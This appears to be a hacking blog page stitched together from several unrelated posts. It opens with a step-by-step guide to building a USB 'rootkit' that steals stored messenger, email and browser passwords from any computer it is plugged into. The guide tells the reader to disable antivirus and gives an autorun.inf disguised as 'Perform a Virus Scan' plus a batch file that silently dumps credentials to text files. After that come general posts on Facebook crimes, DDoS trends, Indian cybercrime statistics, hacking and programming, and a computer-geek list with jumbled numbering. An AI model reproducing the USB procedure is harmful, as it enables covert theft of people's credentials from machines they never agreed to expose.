Hack Password with ur Pen Drive

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe andpasswordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]

open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP and Vista
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

7 Most Common Facebook Crimes

social_network_crimes
It’s a pleasure for me to propose to my readers an article of my colleagues of TheBestDegreesGroup on social networking and related crimes. Several times I highlighted the importance of social networking and of all related form of communication. Of course with the rapid diffusion of technology the number of crimes is increased dramatically. Here a good summary of the main crimes on social networks.
There’s no doubt that Facebook has completely revolutionized the way people interact. But there’s a dark side to the world’s love affair with social media. Criminals are finding new ways to utilize Facebook to commit new and disturbing crimes that authorities don’t necessarily know how to police. That’s why if you want to continue to enjoy social media, you should be aware of the common crimes committed on Facebook so that you can avoid becoming a victim. Here are the seven most common Facebook crimes.

  1. Scams

Criminals have been utilizing the scam for centuries. In the Facebook world, scams are particularly effective at drawing people in by simply enticing an individual to click on a link that would interest almost anyone, such as an innocent-looking notification that you’ve won a free prize like a gift card. Then, in order to claim the prize, scammers require you to submit some information, such as a credit card number or Social Security number. This description may make it seem like scams are easy to spot, but even the most savvy social media user has to be on the lookout for illegitimate requests for information.
  2. Cyberbullying

Cyberbullying is a common occurrence among teenagers on Facebook and one that can result in serious criminal charges if it goes far enough. Cyberbullying on Facebook has contributed to the deaths of several teens who either committed suicide or were killed by a peer. Cyberbullying that involves hacking or password and identity theft may be punishable under state and federal law. When adults engage in this kind of online behavior it is called cyber-harassment or cyberstalking.
  3. Stalking

The term “stalking” is thrown around a lot on Facebook, and it is often meant as a joke for regularly looking at someone’s profile. However, the actual act of cyberstalking is a common crime on the social networking site and can result in a serious offense. Cyberstalking typically involves harassing a person with messages, written threats, and other persistent online behavior that endangers a person’s safety. Although cyberstalking may seem like nothing more than annoying behavior, it is a legitimate cause for concern in many cases and can even lead to in-person stalking or endangerment if not treated seriously.
  4. Robbery

It doesn’t take much for a thief to find out where you live, go to school, work, or hang out if you make that information readily available on Facebook. If you use Facebook’s check-in or Google Maps feature, then you could be in a heap of trouble if a robber is paying attention. This person isn’t always a complete stranger either; they may be an old acquaintance or someone else you’d never expect to come rob you.
  1. Identity theft

With the large amount of personal information swarming around Facebook these days, it has become fairly easy for criminals to steal users’ identities. Hackers often break into users’ e-mails and make fake Facebook accounts. From there they can access personal and bank information and cause havoc to your sense of security. Protect yourself from identity theft on Facebook by keeping your profile very secure and free of personal information that a criminal would love to have.
  2. Defamation

An individual commits the crime of defamation when they communicate a false statement to a third party that paints another individual or entity in a negative light. Facebook makes communicating defamatory statements frighteningly easy, and the exposure Facebook provides makes it more likely that businesses or individuals will be harmed by the defamatory statement, and thus more likely to pursue legal remedies. Be careful what you say on Facebook; you may be committing a crime without even knowing it.
  3. Harassment

Harassment happens all the time on Facebook. From sexual harassment to assault threats, there has been a significant increase in the number of harassment cases happening on Facebook. It’s not uncommon for sex offenders and sexual predators to prey on unsuspecting victims on Facebook and even pose as a teen or college student. Harassing messages, inappropriate comments, and other persistent behaviors should be reported to Facebook and your local police station.

Dos Attack - So Simple yet So Dangerous

The article proposes an analysis of DDoSattacks, explaining how the offensive technique is used in several contexts to hit strategic targets for different purposes. The discussion is supported with the statistics provided by the principal security firms that provide solutions to protect infrastructures from this kind of attacks. The article also include a specific part on the new factors that could support DDoS attacks such as the introduction of IPv6 protocol and the diffusion of mobile platforms.

Introduction

Let’s introduce one of the most diffused type of cyber attacks that represents a great concern for governments and institutions, the DDoS (Distributed Denial of Service). The attack is conducted with the intent to make a network resources unavailable and usually involve a large number of machines that target the same objective interrupting or suspending the services it provides. The principle on which the attack method is based is the saturation of the resources available to the targets that are flooded by legitimated traffic that are not able to process. The consuming of the resources of final target may usually causes the slowdown in services provided or even complete blockage of the same. It must be clear that Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, an ethic manifesto for internet use. The IAB is the committee charged with oversight of the technical and engineering development of the Internet by the Internet Society (ISOC). DDoS attacks is commonly considered a cyber crime by governments all around the world, they constitute violations of the laws of individual countries, but despite this global acceptance is still very difficult to be pursued due the different legislation and territorial jurisdictions.

The raise of DDoS attacksThe raise of DDoS attacks

Despite it is relative ease organize a DDoS attack, it still represents one of the most feared offensive forms for its ability to interfere with the services provided, DDoS attacks are so widely used by hackers and hacktivists, but also represent a viable military options in the event of a cyber attack against critical enemy structures. According “Worldwide Infrastructure Security Report” published by Arbor Networks, a leading provider of network security and management solutions, Ideologically-Motivated ‘Hacktivism’ and Vandalism Are the Most Readily-Identified DDoS. Arbor Networks has provided evidence that in 2011 behind the majority of DDoS attacks there were group of hacktivists that have involved critical masses in the manifestation of their dissent, 35% reported political or ideological attack motivation meanwhile 31% reported nihilism or vandalism as attack motivation. Today is possible to retrieve tool for DDoS attacks freely such as the famous “low orbit ion cannon” (LOIC), and it’s equally simple rent a botnet with a few tens of dollars, this factor have transformed the DDoS attacks in one of the most dangerous cyber threat. We are facing with crime industry that is arranging specific services to rent ad hoc network used to amplify attacks, a phenomenon in constant growth. We have also consider that the attacks are becoming daily more sophisticated addressing various level of network stack and often in multilayered offensive.
A great contribution to the raise of number of DDoS attacks is given also by the diffusion of malware agents, it is the case of a newer version of the Russkill bot also also known as Dirt Jumper, responsible for a many attacks. Iit seems that the author of the malware has released another DDoS toolkit that has similar structure and functionalities, named Pandora, that will give a sensible contribute in term of cyber attacks. The increase of the attacks is also motivated by a couple of other factor, the diffusion of mobile devices and also the introduction of IPv6 protocol. One of the IT sector that is interested by the major growth is without doubt the mobile, an increasing number of platforms and related application has been developed in the last mouth consolidating the trend. Of course with growth has been observed a sensible increasing of cyber attacks on the mobile sector, today still vulnerable on the security perspective. To an impressive growth in the demand is not corresponded the awareness of the threat, the user ignores most of the time the potential of its smartphone and threats which it is exposed. Mobile botnet is a botnet that targets mobile devices such as smartphones, attempting to gain complete control of them. Mobile botnets take advantage
of unpatched exploits to provide hackers with root permissions over the compromised mobile device, enabling hackers to send e-mail or text messages, make phone calls, spy on users, access contacts and photos, and more. The main problem is that botnets go undetected and this make really difficult to tackle. The malware spread themself sending the agents to other devices via e-mail messages or text messages. But cyber threat related to mobile devices is not also related to a malware infection, due the difficult to track the origin of attacks in many cases these platform are used to launch attacks in deliberate way, it’s the case for example of a user that decide to participate to a DDoS attacks downloading a specific tool to flood with traffic the final target. As anticipated another meaningful phenomenon is the introduction of IPv6 protocol, the switchover from the protocol IPv4, to IPv6 will create vast numbers of new internet addresses that could be used to orange a DDoS attacks. Despite this kind of incidents are relatively rare, the introduction of the new protocol represents an attractive opportunity for cyber criminals that intend to move a DDoS attack, let’s consider that the first attacks based on IPv6 addresses have been already discovered.

Conclusions

This type of attacks is still preferred by group of hacktivist that are intensifying the offense against private companies and governments, but also cybercrime is adopting it in complex operation where the need is to block a web service meanwhile a fraud schema is implemented. The attacks is also largely adopted in cyber warfare to hit the critical infrastructures of a country, let’s remind that also financial institution of a nation are considerable vital entities for a country. Despite the last quarter has registered a reduction of the total number of attacks the cyber threat is still very worrying, the DDoS doubled in Q2 2012 respect the same quarter one year ago. The diffusion of botnets and also the introduction of IPv6 represents a further factors that could amplify the magnitude of the cyber threats and frequency of this type of attacks. DDoS attack is evolving, are both private and government sectors ready to protect their structures? Underestimate the threat could be very dangerous!

Cyber crime cases up 50% in India

According to The Times of India AHMEDABAD: Gujarat has reported an almost 50% rise in crimes under the Information Technology Act, 2000. Compared to 35 cases in 2010, 2011 reported 52 cases as per the 'Crime In India' report published by National Crime Records Bureau (NCRB). Twenty cases were registered under IPC sections this year, against 15 the previous year. From the cases reported, the highest came from Ahmedabad (36), followed by Vadodara (10). Surat and Rajkot reported one and two cases respectively.
Nationally, Andhra Pradesh (349) ranked first, followed by Maharashtra (306) and Kerala (227). In cities, Bangalore (117) reported the most incidents while Visakhapatnam (107) and Pune (83) ranked second and third.
Nationally, most cases were reported about loss of computer resources and obscene publications online. All over the country 157 cases of hacking were reported and 65 persons were arrested for the offence. Other offences include misuse of digital signatures, forging digital documents, unauthorized access and breach of confidentiality.
State police arrested 36 persons for cyber crimes in 2011 of which 17 were below 30 years of age. 18 of the arrests were from Ahmedabad.

Pathetic Situation in Andhra Pradesh

Cyber crime cases, phishing and transmission of obscene content in electronic form has seen a rise in Andhra Pradesh which has also witnessed a two-fold increase in the arrest of cyber offenders in 2011. From 197 cyber crime cases reported in 2010, the number went up to 350 in 2011 and the cases were registered at three Cyber Crime police stations, including the Cyber Crime wing of CID here and different Cyber Crime units functioning across the state, a senior police officer said.

"Close to 100 offenders were arrested during 2011 as compared to about 60 in the previous year in connection with various cyber offences," Superintendent of Police (CID-Cyber Crime) U Rama Mohan told PTI.

Over 90 cases pertaining to the posting of objectionable content targeting women and girls on social networking sites and sending vulgar emails were registered in 2011, besides some other important cyber crime incidents.
Cyber sleuths are in touch with the Interpol, MHA and other agencies like Computer Emergency Response Team and National Technological Research Organisation to improve monitoring and coordinating detection of cyber crimes.
"We have sought help from the Interpol that will enable us in getting information on overseas servers (used in cyber crimes) and help in extradition of such offenders," he said.
Recently, Interpol's help was sought for a case, in which a person from England was "harassing" a girl in Andhra Pradesh, he added.

Is Programming Knowledge Necessary for A Hacker..?

"Can I become a good hacker without knowning Programming?", "Is Programming necessary for learning how to hack",
I usually get these question asked from my students, There have been lots of debates on this topic, Some think that it's necessary while others think that it's not necessary at all, So I thought to write a post on this topic explaining my views if programming is necessary for becoming a hacker or not.
The answer is that it depends:

Why it's not necessary?
In early 90's the best hackers were known as those who were best at the knowledge of programming and the reason for that was probably that almost every thing was based on a command line so it was for sure that if some one is a good hacker he is surely a good programmer.

However the definition of hackers sort of changed after the beginning of 21'ST century, One could become a fairly good hacker without any knowledge of programming, This reason for that is because now a days there are lots of ready made tools which helps you to compromise a machine without any knowledge of Programming, Take an example of "Havij", Havij is a small software which helps you automate the process of SQL Injection and helps you extract sensitive database information in seconds where it may take hours in some cases to extract it.

Where It's Necessary?
It's true that many good hackers are technology buffs and are curious about how things work, this is where you need to have prior knowledge of Programming in order to know how things work.
Another reason is why you should probably learn Programming is that you can write your own exploit (An exploit is a piece of code which can be used to gain access to the target machine using a specific vulnerability), which is the single most important thing which will separate you from rest of the script kiddies out there and most of the times some of the exploit codes comes with several code mistakes which are kept by Elite hackers themselves to prevent script kiddies or people with very little knowledge of hacking to run it.

In Short:
You can become a fairly good hacker without having a prior knowledge of programming but if you want take your hacking skills to the next level I will recommend you to learn Programming now the question which might arise in your mind is that what Programming languages should I learn?, I will cover it in my upcoming posts.

Want to Be a Computer Geek?

Little known to most, there are many benefits to being a computer geek. In our high-tech society, being a computer guru can be one of the most high paying jobs available and they are highly in demand, especially if you want to become a network administrator. By tapping into your inner geek, you can   develop a most useful skill that will be sure to pay off later in life.
  1. Learn what hardware is
  2. Hardware is the physical stuff that makes up the computer and the media that is used to connect computers to other computers.

  3. Learn what software is
  4. Software is the stuff that makes the computer work and it includes the applications, protocols, and the operating system.

  5. Learn the specs (technical specifications) of your computer
  6. There are some programs one can use in order to learn the specific specs a computer has, if you do not know off-hand. E.g. CPU-Z.

  7. Learn to use your computer's command line
  8. use it when you need to. Learning to use your computer's command line (MS DOS Prompt/Command Prompt in Windows, Terminal or Konsole in Linux) is essential to at least boosting your efficiency on your computer. In Windows, the DOS prompt isn't especially useful, but it's a good idea to know how to use it. However, in Linux or UNIX, Mac or BSD, or other Unix-like operating systems, it is important to be able to use the command line so that you can work more efficiently via bash scripts.

  9. Learn to type without looking at the keyboard
  10. This isn't especially important, but this will definitely boost your efficiency at the computer, and make yourself look more sensible.

  11. Ask
  12. If someone does something on a computer that you would like to know, ask them about it.

  13. Learn a programming language
  14. This is one of the most important things to do. Don't confuse certain types of languages with others. Interpreted languages like BASIC aren't very good for true computer programming, but if all you want to do is write a simple computer game, it's fine. HTML or CSS are for web pages, and it's a good idea to know them, but they won't be especially useful for really programming your computer. It is recommended that you learn the scripting language of your prompt (e.g. Bash) as that will bring power and simplicity for a novice programmer and admin. However, you may learn any language you like.

  15. Start learning basic repair procedures
  16. This can help you out a lot if your or someone else's computer breaks down, which will also increase your reputation as a computer geek. You may learn the advanced methods, but that may require lessons from an actual computer geek.

  17. Work with others with their computer problems
  18. By interacting with other PC users, you may find that they know things that you don't and vice versa. However as a computer geek wannabe, you'll want to know more about computer than your friends, at any given time.

  19. Help others out with their computer problems. Not only will you build a name for yourself, but it is good practice and can help you learn about situations and problems you have not encountered before.

  20. Learn how to install and upgrade drivers for various hardware types
  21. This will come in handy when you re-install your Operating System.

  22. Learn to recognize malware(computer viruses, spyware and the other nasty stuff) before running the daily antivirus/antispyware scans

  23. Use a restrictive firewall, that would cause normal people to cry because they don't understand how to use it
  24. Of course, you should know how to use it!

  25. Use an Open Source Operating System
  26. . Most computer geeks will use an open OS such as *BSD or Linux, because it is (usually) free and allows them to do geeky stuff such as programming, running servers and using a command line interface (CLI).

  27. Use Shortcuts
  28. It is important to know shortcuts as it shaves off valuable seconds of your precious time.

  29. Know the inner workings of the Internet

  30. Remember to keep things simple
  31. Skip overwhelming or overly-complicated ideas. Instead, focus on learning the knowledge and skills you may need to accomplish a big idea in the future.

  32. Expand your knowledge
  33. Computer geeks aren't too smart to learn something new about computers. True computer geeks are always learning, and when they don't understand, always asking for help. Collect knowledge. Put things together. Read articles on Wikipedia, join computer forums for your programming language or just regular forums, and ask questions. If you have trouble learning, write things down and quiz yourself. Whatever your methods, be sure to be continuously learning more about computers.

  34. Certain kinds of math are very important to geeks
  35. One bit of data is a binary digit - a one or a zero. Eight bits make a byte. Most people think of a kilobyte as 1,000 bytes, but it's really 1,024. Learn how many bytes are in a kilobyte (KB), megabyte (MB), gigabyte (GB) and so on. Once you have that down, get comfortable with binary. From there, learn to use octal and hexadecimal, and how to convert from one base to another. When you understand why programmers always get Christmas and Halloween mixed up, you're well on your way to becoming a true geek.
